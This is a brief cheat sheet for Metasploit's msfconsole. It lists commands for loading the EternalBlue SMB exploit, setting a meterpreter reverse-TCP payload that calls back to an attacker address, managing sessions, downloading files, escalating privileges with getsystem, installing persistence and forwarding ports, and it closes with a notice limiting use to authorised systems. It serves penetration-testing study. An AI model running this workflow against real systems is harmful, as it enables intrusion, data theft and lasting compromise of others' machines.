Msfconsole Cheat Sheet
msfconsole is the primary command-line interface of the Metasploit Framework. It is used to manage exploits, payloads, auxiliary modules, and post-exploitation tasks.
Start Msfconsole
msfconsole
Quiet mode:
msfconsole -q
Help & Navigation
help
?
Search modules:
search smb
search type:exploit platform:windows
Module Types
exploitauxiliarypayloadpostencodernop
Use a Module
use exploit/windows/smb/ms17_010_eternalblue
Show options:
show options
Show payloads:
show payloads
Set Options
set RHOSTS 192.168.1.10
set LHOST 192.168.1.5
set LPORT 4444
Global option:
setg LHOST 192.168.1.5
Payload Selection
set PAYLOAD windows/x64/meterpreter/reverse_tcp
Run Exploit
run
or:
exploit
Run in background:
exploit -j
Sessions
List sessions:
sessions
Interact:
sessions -i 1
Kill:
sessions -k 1
Meterpreter Basics
sysinfo
getuid
pwd
ls
Upload / Download:
upload file.exe
download secret.txt
Shell:
shell
Privilege Escalation
getsystem
use post/multi/recon/local_exploit_suggester
Persistence
run persistence -X -i 10 -p 4444 -r 192.168.1.5
Port Forwarding
portfwd add -l 8080 -p 80 -r 127.0.0.1
Database Commands
db_status
db_nmap -sV 192.168.1.10
hosts
services
Workspace Management
workspace
workspace -a test
workspace test
Typical Workflow
msfconsole
search exploit
use exploit/...
set RHOSTS target
set PAYLOAD ...
run
sessions -i 1
Common Issues
Exploit failed
- Wrong payload
- Target not vulnerable
- Bad network config
No session created
- Firewall blocking callback
- Incorrect LHOST
Related Tools
nmapnetcatbeefsetoolkit
Legal Notice
Danger
Use Metasploit only on systems you own or have explicit permission to test.